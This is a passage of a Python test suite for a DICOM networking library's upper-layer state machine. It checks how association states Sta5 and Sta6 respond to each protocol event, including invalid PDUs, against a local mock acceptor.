            ("Sta5", "Evt3", "AE-3"),
        ]
        assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta6"]
        assert self.fsm._events[:3] == ["Evt1", "Evt2", "Evt3"]
    def test_evt04(self):
        """Test Sta5 + Evt4."""
        # Sta5 + Evt4 -> AE-4 -> Sta1
        # Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
        # AE-4: Issue A-ASSOCIATE (rj) primitive
        commands = [("recv", None), ("send", a_associate_rj), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:3] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt4", "AE-4"),
        ]
        assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta1"]
        assert self.fsm._events[:3] == ["Evt1", "Evt2", "Evt4"]
    @pytest.mark.skip()
    def test_evt05(self):
        """Test Sta5 + Evt5."""
        # Sta5 + Evt5 -> <ignore> -> Sta5
        # Evt5: Receive TRANSPORT_INDICATION from <transport service>
        # AE-5: Issue TRANSPORT_RESPONSE to <transport service>
        #       Start ARTIM timer
        pass
    def test_evt06(self):
        """Test Sta5 + Evt6."""
        # Sta5 + Evt6 -> AA-8 -> Sta13
        # Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("recv", None),
            ("send", a_associate_rq),
            ("recv", None),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:3] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt6", "AA-8"),
        ]
        assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
        assert self.fsm._events[:3] == ["Evt1", "Evt2", "Evt6"]
        # The acceptor's second recv is the A-ABORT PDU (source 0x02:
        # DUL service-provider, i.e. an A-P-ABORT).
        assert scp.handlers[0].received[1] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
        )
    def test_evt07(self):
        """Test Sta5 + Evt7."""
        # Sta5 + Evt7 -> <ignore> -> Sta5
        # Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
        commands = [("recv", None), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.send_pdu(self.get_associate("accept"))
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:2] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
        ]
        assert self.fsm._transitions[:2] == ["Sta4", "Sta5"]
        assert self.fsm._events[:3] == ["Evt1", "Evt2", "Evt7"]
    def test_evt08(self):
        """Test Sta5 + Evt8."""
        # Sta5 + Evt8 -> <ignore> -> Sta5
        # Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
        commands = [("recv", None), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.send_pdu(self.get_associate("reject"))
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:2] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
        ]
        assert self.fsm._transitions[:2] == ["Sta4", "Sta5"]
        assert self.fsm._events[:3] == ["Evt1", "Evt2", "Evt8"]
    def test_evt09(self):
        """Test Sta5 + Evt9."""
        # Sta5 + Evt9 -> <ignore> -> Sta5
        # Evt9: Receive P-DATA primitive from <local user>
        commands = [("recv", None), ("exit", None)]  # recv a-associate-rq
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.send_pdu(self.get_pdata())
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:2] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
        ]
        assert self.fsm._transitions[:2] == ["Sta4", "Sta5"]
        assert self.fsm._events[:3] == ["Evt1", "Evt2", "Evt9"]
    def test_evt10(self):
        """Test Sta5 + Evt10."""
        # Sta5 + Evt10 -> AA-8 -> Sta13
        # Evt10: Receive P-DATA-TF PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [("recv", None), ("send", p_data_tf), ("recv", None), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:3] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt10", "AA-8"),
        ]
        assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
        assert self.fsm._events[:3] == ["Evt1", "Evt2", "Evt10"]
        # Issue A-ABORT PDU
        assert scp.handlers[0].received[1] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
        )
    def test_evt11(self):
        """Test Sta5 + Evt11."""
        # Sta5 + Evt11 -> <ignore> -> Sta5
        # Evt11: Receive A-RELEASE (rq) primitive from <local user>
        commands = [("recv", None), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.send_pdu(self.get_release(False))
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:2] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
        ]
        assert self.fsm._transitions[:2] == ["Sta4", "Sta5"]
        assert self.fsm._events[:3] == ["Evt1", "Evt2", "Evt11"]
    def test_evt12(self):
        """Test Sta5 + Evt12."""
        # Sta5 + Evt12 -> AA-8 -> Sta13
        # Evt12: Receive A-RELEASE-RQ PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("recv", None),
            ("send", a_release_rq),
            ("recv", None),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:3] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt12", "AA-8"),
        ]
        assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
        assert self.fsm._events[:3] == ["Evt1", "Evt2", "Evt12"]
        # Issue A-ABORT PDU
        assert scp.handlers[0].received[1] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
        )
    def test_evt13(self):
        """Test Sta5 + Evt13."""
        # Sta5 + Evt13 -> AA-8 -> Sta13
        # Evt13: Receive A-RELEASE-RP PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("recv", None),
            ("send", a_release_rp),
            ("recv", None),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:3] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt13", "AA-8"),
        ]
        assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
        assert self.fsm._events[:3] == ["Evt1", "Evt2", "Evt13"]
        # Issue A-ABORT PDU
        assert scp.handlers[0].received[1] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
        )
    def test_evt14(self):
        """Test Sta5 + Evt14."""
        # Sta5 + Evt14 -> <ignore> -> Sta5
        # Evt14: Receive A-RELEASE (rsp) primitive from <local user>
        commands = [("recv", None), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.send_pdu(self.get_release(True))
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:2] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
        ]
        assert self.fsm._transitions[:2] == ["Sta4", "Sta5"]
        assert self.fsm._events[:3] == ["Evt1", "Evt2", "Evt14"]
    def test_evt15(self):
        """Test Sta5 + Evt15."""
        # Sta5 + Evt15 -> AA-1 -> Sta13
        # Evt15: Receive A-ABORT (rq) primitive from <local user>
        # AA-1: Send A-ABORT PDU and restart ARTIM
        commands = [("recv", None), ("recv", None), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.send_pdu(self.get_abort())
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:3] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt15", "AA-1"),
        ]
        assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
        assert self.fsm._events[:3] == ["Evt1", "Evt2", "Evt15"]
        # Issue A-ABORT PDU (source 0x00: DUL service-user initiated)
        assert scp.handlers[0].received[1] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00"
        )
    def test_evt16(self):
        """Test Sta5 + Evt16."""
        # Sta5 + Evt16 -> AA-3 -> Sta1
        # Evt16: Receive A-ABORT PDU from <remote>
        # AA-3: If service user initiated:
        #           Issue A-ABORT primitive and close transport
        #       Otherwise
        #           Issue A-P-ABORT primitive and close transport
        commands = [("recv", None), ("send", a_abort), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:3] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt16", "AA-3"),
        ]
        assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta1"]
        assert self.fsm._events[:3] == ["Evt1", "Evt2", "Evt16"]
    def test_evt17(self):
        """Test Sta5 + Evt17."""
        # Sta5 + Evt17 -> AA-4 -> Sta1
        # Evt17: Receive TRANSPORT_CLOSED from <transport service>
        # AA-4: Issue A-P-ABORT primitive
        commands = [("recv", None), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.shutdown()
        # Give the DUL reactor time to notice the closed transport (Evt17).
        time.sleep(0.5)
        assert self.fsm._changes[:3] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt17", "AA-4"),
        ]
        assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta1"]
        assert self.fsm._events[:3] == ["Evt1", "Evt2", "Evt17"]
    def test_evt18(self):
        """Test Sta5 + Evt18."""
        # Sta5 + Evt18 -> <ignore> -> Sta5
        # Evt18: ARTIM timer expired from <local service>
        commands = [("recv", None), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        # Force a quick ARTIM expiry, then wait long enough for Evt18.
        self.assoc.dul.artim_timer.timeout = 0.05
        self.assoc.dul.artim_timer.start()
        time.sleep(0.5)
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:3] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
        ]
        assert self.fsm._transitions[:3] == ["Sta4", "Sta5"]
        assert self.fsm._events[:3] == ["Evt1", "Evt2", "Evt18"]
    def test_evt19(self):
        """Test Sta5 + Evt19."""
        # Sta5 + Evt19 -> AA-8 -> Sta13
        # Evt19: Received unrecognised or invalid PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        # 0x08 is not a valid PDU type, so the bytes below are invalid.
        commands = [
            ("recv", None),
            ("send", b"\x08\x00\x00\x00\x00\x00"),
            ("recv", None),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:3] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt19", "AA-8"),
        ]
        assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
        assert self.fsm._events[:3] == ["Evt1", "Evt2", "Evt19"]
        # Issue A-ABORT PDU
        assert scp.handlers[0].received[1] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
        )
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState06(TestStateBase):
    """Tests for State 06: Association established and ready for data.

    Each test negotiates a full association (requestor reaches Sta6), fires
    one event, and checks the recorded FSM history.  In Sta6, P-DATA flows
    both ways (DT-1/DT-2), release requests start the release collision
    states (AR-1/AR-2), and unexpected association/release PDUs trigger
    AA-8 (send A-ABORT, go to Sta13).
    """
    def move_to_state(self, assoc, scp):
        """Start *assoc* and wait until its FSM reaches Sta6.

        Two ``scp.step()`` calls let the mock acceptor receive the
        A-ASSOCIATE-RQ and send back the A-ASSOCIATE-AC.
        """
        assoc.start()
        scp.step()
        scp.step()
        self.wait_on_state(assoc.dul.state_machine, "Sta6")
    def test_evt01(self):
        """Test Sta6 + Evt1."""
        # Sta6 + Evt1 -> <ignore> -> Sta6
        # Evt1: A-ASSOCIATE (rq) primitive from <local user>
        commands = [("recv", None), ("send", a_associate_ac), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.send_pdu(self.get_associate("request"))
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:3] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
        ]
        assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta6"]
        assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt3", "Evt1"]
    @pytest.mark.skip()
    def test_evt02(self):
        """Test Sta6 + Evt2."""
        # Sta6 + Evt2 -> <ignore> -> Sta6
        # Evt2: Receive TRANSPORT_OPEN from <transport service>
        pass
    def test_evt03(self):
        """Test Sta6 + Evt3."""
        # Sta6 + Evt3 -> AA-8 -> Sta13
        # Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        # A second (unexpected) A-ASSOCIATE-AC arrives after association.
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("send", a_associate_ac),
            ("recv", None),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:4] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt3", "AA-8"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta13"]
        assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt3", "Evt3"]
        # The acceptor's second recv is the A-ABORT PDU (source 0x02:
        # DUL service-provider, i.e. an A-P-ABORT).
        assert scp.handlers[0].received[1] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
        )
    def test_evt04(self):
        """Test Sta6 + Evt4."""
        # Sta6 + Evt4 -> AA-8 -> Sta13
        # Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("send", a_associate_rj),
            ("recv", None),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:4] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt4", "AA-8"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta13"]
        assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt3", "Evt4"]
        # Issue A-ABORT PDU
        assert scp.handlers[0].received[1] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
        )
    @pytest.mark.skip()
    def test_evt05(self):
        """Test Sta6 + Evt5."""
        # Sta6 + Evt5 -> <ignore> -> Sta6
        # Evt5: Receive TRANSPORT_INDICATION from <transport service>
        pass
    def test_evt06(self):
        """Test Sta6 + Evt6."""
        # Sta6 + Evt6 -> AA-8 -> Sta13
        # Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("send", a_associate_rq),
            ("recv", None),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:4] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt6", "AA-8"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta13"]
        assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt3", "Evt6"]
        # Issue A-ABORT PDU
        assert scp.handlers[0].received[1] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
        )
    def test_evt07(self):
        """Test Sta6 + Evt7."""
        # Sta6 + Evt7 -> <ignore> -> Sta6
        # Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
        commands = [("recv", None), ("send", a_associate_ac), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.send_pdu(self.get_associate("accept"))
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:3] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
        ]
        assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta6"]
        assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt3", "Evt7"]
    def test_evt08(self):
        """Test Sta6 + Evt8."""
        # Sta6 + Evt8 -> <ignore> -> Sta6
        # Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
        commands = [("recv", None), ("send", a_associate_ac), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.send_pdu(self.get_associate("reject"))
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:3] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
        ]
        assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta6"]
        assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt3", "Evt8"]
    def test_evt09(self):
        """Test Sta6 + Evt9."""
        # Sta6 + Evt9 -> DT-1 -> Sta6
        # Evt9: Receive P-DATA primitive from <local user>
        # DT-1: Send P-DATA-TD PDU
        commands = [("recv", None), ("send", a_associate_ac), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.send_pdu(self.get_pdata())
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:4] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt9", "DT-1"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta6"]
        assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt3", "Evt9"]
    def test_evt10(self):
        """Test Sta6 + Evt10."""
        # Sta6 + Evt10 -> DT-2 -> Sta6
        # Evt10: Receive P-DATA-TF PDU from <remote>
        # DT-2: Send P-DATA primitive
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("send", p_data_tf),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:4] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt10", "DT-2"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta6"]
        assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt3", "Evt10"]
    def test_evt11(self):
        """Test Sta6 + Evt11."""
        # Sta6 + Evt11 -> AR-1 -> Sta7
        # Evt11: Receive A-RELEASE (rq) primitive from <local user>
        commands = [("recv", None), ("send", a_associate_ac), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.send_pdu(self.get_release(False))
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:3] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
        ]
        assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta6"]
        assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt3", "Evt11"]
    def test_evt12(self):
        """Test Sta6 + Evt12."""
        # Sta6 + Evt12 -> AR-2 -> Sta8
        # Evt12: Receive A-RELEASE-RQ PDU from <remote>
        # AR-2: Issue A-RELEASE (rq) primitive
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("send", a_release_rq),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:4] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt12", "AR-2"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta8"]
        assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt3", "Evt12"]
    def test_evt13(self):
        """Test Sta6 + Evt13."""
        # Sta6 + Evt13 -> AA-8 -> Sta13
        # Evt13: Receive A-RELEASE-RP PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("send", a_release_rp),
            ("recv", None),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:4] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt13", "AA-8"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta13"]
        assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt3", "Evt13"]
        # Issue A-ABORT PDU
        assert scp.handlers[0].received[1] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
        )
    def test_evt14(self):
        """Test Sta6 + Evt14."""
        # Sta6 + Evt14 -> <ignore> -> Sta6
        # Evt14: Receive A-RELEASE (rsp) primitive from <local user>
        commands = [("recv", None), ("send", a_associate_ac), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.send_pdu(self.get_release(True))
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:3] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
        ]
        assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta6"]
        assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt3", "Evt14"]
    def test_evt15(self):
        """Test Sta6 + Evt15."""
        # Sta6 + Evt15 -> AA-1 -> Sta13
        # Evt15: Receive A-ABORT (rq) primitive from <local user>
        # AA-1: Send A-ABORT PDU and start ARTIM
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("recv", None),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        self.assoc.abort()
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:4] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt15", "AA-1"),
        ]
        # NOTE(review): only the first three transitions are checked here,
        # unlike sibling tests which also assert "Sta13" — presumably the
        # abort may tear the connection down before Sta13 is recorded;
        # confirm before tightening to [:4].
        assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta6"]
        assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt3", "Evt15"]
        # Issue A-ABORT PDU (source 0x00: DUL service-user initiated)
        assert scp.handlers[0].received[1] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00"
        )
    def test_evt16(self):
        """Test Sta6 + Evt16."""
        # Sta6 + Evt16 -> AA-3 -> Sta1
        # Evt16: Receive A-ABORT PDU from <remote>
        # AA-3: Issue A-ABORT or A-P-ABORT, and close connection
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("send", a_abort),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:4] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt16", "AA-3"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta1"]
        assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt3", "Evt16"]
    def test_evt17(self):
        """Test Sta6 + Evt17."""
        # Sta6 + Evt17 -> AA-4 -> Sta1
        # Evt17: Receive TRANSPORT_CLOSED from <transport service>
        # AA-4: Issue A-P-ABORT primitive
        commands = [("recv", None), ("send", a_associate_ac), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.shutdown()
        # Give the DUL reactor time to notice the closed transport (Evt17).
        time.sleep(0.5)
        assert self.fsm._changes[:4] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt17", "AA-4"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta1"]
        assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt3", "Evt17"]
    def test_evt18(self):
        """Test Sta6 + Evt18."""
        # Sta6 + Evt18 -> <ignore> -> Sta6
        # Evt18: ARTIM timer expired from <local service>
        commands = [("recv", None), ("send", a_associate_ac), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        # Force a quick ARTIM expiry, then wait long enough for Evt18.
        self.assoc.dul.artim_timer.timeout = 0.05
        self.assoc.dul.artim_timer.start()
        time.sleep(0.5)
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:3] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
        ]
        assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta6"]
        assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt3", "Evt18"]
    def test_evt19(self):
        """Test Sta6 + Evt19."""
        # Sta6 + Evt19 -> AA-8 -> Sta13
        # Evt19: Received unrecognised or invalid PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        # 0x08 is not a valid PDU type, so the bytes below are invalid.
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("send", b"\x08\x00\x00\x00\x00\x00"),
            ("recv", None),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:4] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt19", "AA-8"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta13"]
        assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt3", "Evt19"]
        # Issue A-ABORT PDU
        assert scp.handlers[0].received[1] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
        )
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState07(TestStateBase):
    """Tests for State 07: Awaiting A-RELEASE-RP PDU.

    The requestor reaches Sta7 by establishing an association (Sta6) and
    sending an A-RELEASE-RQ (AR-1); it then waits for the acceptor's
    A-RELEASE-RP.  Each ``test_evtNN`` feeds one DUL event into Sta7 and
    checks the recorded state changes, transitions and events.
    """

    def move_to_state(self, assoc, scp):
        # Establish the association (Sta6), then request release so the
        # local state machine moves to Sta7.
        assoc.start()
        scp.step()  # scp: recv the A-ASSOCIATE-RQ
        scp.step()  # scp: send the A-ASSOCIATE-AC
        self.wait_on_state(assoc.dul.state_machine, "Sta6")
        self.assoc.dul.send_pdu(self.get_release(False))
